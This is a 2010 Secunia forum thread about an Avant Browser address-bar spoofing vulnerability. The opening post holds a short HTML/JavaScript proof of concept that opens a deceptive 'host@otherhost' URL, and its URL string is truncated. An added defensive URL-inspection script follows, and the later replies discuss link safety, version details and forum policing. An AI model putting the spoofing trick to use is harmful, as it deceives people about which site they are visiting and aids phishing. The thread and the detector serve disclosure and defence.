Secunia
| Pouya | Avant Browser Address Bar Spoofing Vulnerability |
|---|---|
|
19th Jul, 2010 16:53 |
|
Ranking: 4 Posts: 6 User Since: 9th Jun, 2010 System Score: N/A Location: IR |
<!-- Avant Browser (@) Address Bar Spoofing Vulnerability Discovered by: Pouya Daneshmand http://Securitylab.ir/Advisories --> <html> <head> <script type="text/javascript"> function Spoof() { window.open("http://www.Securitylab.ir@yaho } </script> </head> <body> <form> <p align="center"> <input type="button" value="Click Here" onclick="Spoof()"> </p> </form> </body> </html> -- http://Pouya.Securitylab.ir |
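In a URL of the form `http://A@B/`, standard URL syntax treats `A` as userinfo and `B` as the host the browser connects to, which is the shape of the link in the post above. The following is an added example, not part of the original post or of any browser's code: it uses the standard `URL` parser to report the real host and flag host-like userinfo. The function names and the sample URLs (reserved example domains) are assumptions.

```javascript
// Added example. Sample URLs use reserved example domains (constructed).
// inspectUrl / stripUserinfo are illustrative names, not a browser API.

const HOSTLIKE = /^(?:[a-z0-9-]+\.)+[a-z]{2,}$/i;

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

// Parse a link the way the URL standard does and report where it really goes.
function inspectUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch {
    return { valid: false, suspicious: false };
  }
  const user = safeDecode(u.username);
  // Userinfo that reads like a host name differing from the real host
  // is the pattern a spoofed address bar relies on.
  const suspicious =
    user !== "" && HOSTLIKE.test(user) && user.toLowerCase() !== u.hostname;
  return {
    valid: true,
    realHost: u.hostname,      // what the browser actually connects to
    userinfo: user,            // text before "@", never the destination
    hasPassword: u.password !== "",
    suspicious,
  };
}

// Return the URL with credentials removed, suitable for display or logging.
function stripUserinfo(raw) {
  const u = new URL(raw);
  u.username = "";
  u.password = "";
  return u.href;
}

const samples = [
  "http://www.example.com@example.org/login", // host-like userinfo
  "http://www.example.com:80@example.org/",   // fake "port" is a password
  "ftp://alice@example.net/pub/",             // ordinary user name
  "https://example.com/path",                 // no userinfo
];
for (const s of samples) console.log(s, inspectUrl(s));
```

A mail filter, proxy or link preview can show `realHost` (or the output of `stripUserinfo`) instead of the raw string, so the text before `@` never stands in for the destination.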
| taffy078 | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
19th Jul, 2010 17:44 | ||||||||
| Score: 399 Posts: 1,200 User Since: 26th Feb 2009 System Score: 100% Location: UK Last edited on 19th Jul, 2010 17:44 |
please read what I posted in his Opera Browser thread***: I suggest that you do not click on the link shown in this post until Secunia/an expert reads it and advises - unless you know what you are doing. This post clearly is way beyond my technical ability but you may wish to look at the following Bing search results (or search yourself). You'll see many unsafe sites in the search. http://www.bing.com/search?q=pouya+Daneshmand&src=... ***http://secunia.com/community/forum/thread/show/478... -- taffy078, West Yorkshire, UK Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003 Laptop: Win 7 / IE9 / PSI v2.0.0.3003 |
| Maurice Joyce | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 01:47 | ||||||||
| Score: 10538 Posts: 8,113 User Since: 4th Jan 2009 System Score: 100% Location: UK |
I have tested all the sites on pages 1 & 2 produced from your hyperlink here: http://www.bing.com/search?q=pouya+Daneshmand&src= All are perfectly safe. If U fully research all the findings U will note that bad gradings have been contradicted by safe gradings. This happens. Norton Safe, WOT & other like programmes are powered by user gradings or those owning websites registering their site. Sites not reported on will receive a negative. That means nothing. Reporting users can be novices suffering from total paranoia to researchers who file an accurate assessment of a site's safety. At the end of the day these "add ons programmes" are advisories. If U have faith in your security there is no reason not to research sites, grade them & in most cases benefit from what they have to offer. 00:45 20/07/2010 -- Maurice Windows 7 SP1 64 Bit OS HP Intel Pentium i7 IE 10 for Windows 7 SP1 16GB RAM |
| taffy078 | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 08:59 | ||||||||
| Score: 399 Posts: 1,200 User Since: 26th Feb 2009 System Score: 100% Location: UK Last edited on 20th Jul, 2010 09:02 |
Thank you for that, Maurice. As you know, I am not a technical expert when it comes to computers. I have to rely on the likes of Bing & Norton - both say that they test the sites, and they actually invite the owners of such sites to contact them to have the site tested. Tested sites have a red or green flag - untested sites a grey flag. WOT is based on what users have said, as you say. I wouldn't know how to test a site for 'safety', Maurice - I suspect many members wouldn't either. Are you saying that you simply open it and rely on your AV software to stop any problems if it is in fact a security risk site?? I do trust my AV but I wouldn't tempt fate. If I did, it would be just my luck to go to a site containing a threat that hasn't yet been picked up by my AV! :0) Also, have you had chance to test the links in http://secunia.com/community/forum/thread/show/478... -- taffy078, West Yorkshire, UK Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003 Laptop: Win 7 / IE9 / PSI v2.0.0.3003 |
| Pouya | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 12:22 | ||||||||
| Score: 4 Posts: 6 User Since: 9th Jun 2010 System Score: N/A Location: IR |
@taffy Unsafe? What is your purpose? -- http://Pouya.Securitylab.ir |
| irsdl | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 13:16 | ||||||||
| Score: 12 Posts: 10 User Since: 16th Jul 2010 System Score: N/A Location: UK |
"http://securitylab.ir/Advisories" is not accessible. Could you please provide more information about your findings (App. Version, Vendor, Download Link, etc...). For example "http://secunia.com/community/forum/thread/show/478..." does not work on the latest version of Opera Browser which is 10.60. Thanks in advance for contributing. -- ------ Soroush Dalili soroush.secproject.com/blog/ |
| Pouya | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 14:09 | ||||||||
| Score: 4 Posts: 6 User Since: 9th Jun 2010 System Score: N/A Location: IR |
Avant Browser vulnerability tested on Version 11.7, build 45 (v11.7, build 46 is also vulnerable). Opera 10.60 does not work? You are probably wrong; tested on Opera v10.60, build 3445, it works successfully. -- http://Pouya.Securitylab.ir |
| Maurice Joyce | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 14:20 | ||||||||
| Score: 10538 Posts: 8,113 User Since: 4th Jan 2009 System Score: 100% Location: UK |
@taffy078 I think @Pouya has answered the question for U. What is the point of all these warnings (policing) of threads when U are saying U have no idea how to test links. Surely they should all be left alone until such time as Secunia deems them irrelevant & if necessary removes them. I would certainly issue a warning if I could prove BEYOND doubt they were "troublesome". They are not hence I elect not to comment on individuals or hyperlinks contained within a post. This thread is NO THREAT to anyone & as we can see has provoked a very relevant request for more information. To save writing to other threads the same can be said for advertising of Passcert which appears to be disliked by "The Gang Of Three". They offer a lot more to the IT community than many clearly marked adverts on this thread which appear to come, in the main, from a PC comic called Computer Active. http://secunia.com/community/forum/thread/show/465... Better we leave all this warning (policing) type of activity to Secunia - they own both the programme & Forum & are very capable of telling us if things are amiss. I note one Forum member considers himself part owner of the Forum. The mind boggles. To answer your question directly of course I open all these links where unnecessary doubt is raised about their authenticity merely to counter or confirm alarmist posts. -- Maurice Windows 7 SP1 64 Bit OS HP Intel Pentium i7 IE 10 for Windows 7 SP1 16GB RAM |
| taffy078 | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 14:27 | ||||||||
| Score: 399 Posts: 1,200 User Since: 26th Feb 2009 System Score: 100% Location: UK Last edited on 20th Jul, 2010 14:28 |
Everyone who has a PC has to take care to make it secure - firewalls and anti-virus software are the most well-known & well-used tools in this respect. But it’s also essential that everyone takes care when accessing new websites. Some are unsafe. When I checked out the link (in the first post) with Norton & Bing, many of the sites shown were flagged as unsafe. For example, one had four viruses: two Bloodhound, a Backdoor & a Trojan, according to Norton. I do realise that these sites are likely to have been ones that had reported Pouya’s findings i.e. were not his sites. I rely on Norton & Bing to advise me of sites on the web that I should avoid. That they may occasionally get it wrong doesn't bother me - I will always err on the side of caution, being a PC-user and not a PC-expert. Norton's rating is a result of Symantec's automated analysis system, using their servers to analyze Web sites. Yes - they do use reviews written by customers, some of whom may be paranoid, but these are shown separately. As it was a Saturday i.e. likely that the Support team weren’t in, I simply posted an alert for members not to visit the linked sites until they or another expert had checked them out, or unless they knew what they were doing. Maurice has since done that. If you, Pouya, are the Pouya Daneshmand who discovered the vulnerabilities, I hope that you will accept my explanation. But I would suggest that a great many members or viewers here are not experts so I stand by what I posted. EDIT Crossed with yours, Maurice. -- taffy078, West Yorkshire, UK Desktop: Compaq Presario (OEM) 32 bit / AMD Athlon / 2 GB RAM XP Home - SP3/ IE8/ Norton IS - Secunia PSI v2.0.0.3003 Laptop: Win 7 / IE9 / PSI v2.0.0.3003 |
| Anthony Wells | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 14:28 | ||||||||
| Score: 2329 Posts: 3,205 User Since: 19th Dec 2007 System Score: N/A Location: N/A Last edited on 20th Jul, 2010 14:40 |
@Pouya, If you are wishing to alert Secunia themselves to look at your findings, then you might wish to email them at vuln@secunia.com as suggested by this webpage in the Advisories section of this website: http://secunia.com/advisories/report_vulnerability... This forum is more used for sorting out problems with updating programmes after the PSI or the CSI software have detected a vulnerable programme/piece of software/hardware; of course some of the more technically advanced users might find your posting(s) here of interest. Take care Anthony PS: I can confirm that the hyperlinks in this post are not working (for me) from France; the "blog" link in your other Opera thread is working -- It always seems impossible until it's done. Nelson Mandela |
| Pouya | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 16:01 | ||||||||
| Score: 4 Posts: 6 User Since: 9th Jun 2010 System Score: N/A Location: IR |
@irsdl @Anthony Wells Opera spoofing simple video ;) http://www.youtube.com/watch?v=lHprYkpZn6w Quality: 720p -- http://Pouya.Securitylab.ir |
| thedillpickl | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
20th Jul, 2010 17:22 | ||||||||
| Score: 376 Posts: 872 User Since: 3rd May 2009 System Score: 100% Location: US Last edited on 20th Jul, 2010 17:31 |
I understand the original purpose of this thread (somewhat). This is not it. But, as the gang's all here... 1) I hold to the foolish notion that one should not go where one has no idea what's going on. (Go ahead and make your best crack at that comment, I've come to expect it.) Simply do a little research before running scripts on any machine. Looking at reports and papers on any website could be dangerous if that site is unknown to you. Click on a link and pow. BTW, you run a risk whenever you connect to the internet. If firewalled & security software is in place, it is slight, but still there. 2) If we (That's right, I said we.) are to work together on this forum, perhaps some guidance would be in order. Everyone will not be well versed on every subject. The discussion above is a start, less remarks. 3) I was the guilty party that said I take part ownership of this forum. Of course, it is Secunia's to do with as they please. I did not set it up. I did not pay for anything. I was not asked to moderate or take any control. However, I was invited to participate. If you are to participate it is required to become involved. If you are involved it is required to interact. This is hard to do, if not impossible, when those around you are not also allowed to participate. Last I checked, Secunia still calls this a forum and not a lecture hall. Fred p.s. Could we call this advertising? http://secunia.com/community/forum/thread/show/480... -- XP Home Chrome, Firefox, IE8 -- consilio et animis |
| Anthony Wells | RE: Avant Browser Address Bar Spoofing Vulnerability | ||||||||
|
21st Jul, 2010 12:22 | ||||||||
| Score: 2329 Posts: 3,205 User Since: 19th Dec 2007 System Score: N/A Location: N/A |
@Pouya, Thank you for the link to your Opera spoofing video on YouTube; most enlightening :) Take care Anthony -- It always seems impossible until it's done. Nelson Mandela |